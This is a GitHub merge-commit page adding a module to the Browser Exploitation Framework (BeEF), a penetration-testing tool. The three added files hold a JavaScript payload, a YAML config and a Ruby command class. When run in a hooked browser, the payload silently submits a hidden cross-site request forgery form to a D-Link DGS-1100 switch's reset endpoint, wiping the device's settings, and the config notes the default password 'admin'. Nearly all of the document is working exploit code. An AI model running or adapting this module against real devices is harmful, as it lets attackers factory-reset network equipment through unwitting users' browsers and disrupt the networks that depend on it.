Merge pull request #1367 from nstarke/branches/dlink_dgs_1110-device-reset

Adding DLink DGS 1100 Switch Device Reset CSRF Module
This commit is contained in:
Brendan Coles
2017-02-26 12:38:04 +11:00
committed by GitHub
3 changed files with 56 additions and 0 deletions

View File

@@ -0,0 +1,23 @@
//
// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Hooked browser must be authenticated to switch.
var base = '<%= @base %>';
var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/reset.cgi', 'POST', 'application/x-www-form-urlencoded', [
{ type: 'hidden', name: 'reset', value: 1 }
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(dlink_dgs_iframe);
}
setTimeout("cleanup()", 15000);
});

View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Dlink_dgs_1100_device_reset_csrf:
enable: true
category: ["Exploits", "Switch"]
name: "DLINK DGS 1100-08 Device Reset CSRF"
description: "Reset's everything on the device except for the IP address. Default password is 'admin'"
authors: ["Nick Starke"]
target:
working: ["ALL"]

View File

@@ -0,0 +1,18 @@
#
# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dgs_1100_device_reset_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Switch web root', 'value' => 'http://10.90.90.90'},
]
end
def post_execute
save({'result' => @datastore['result']})
end
end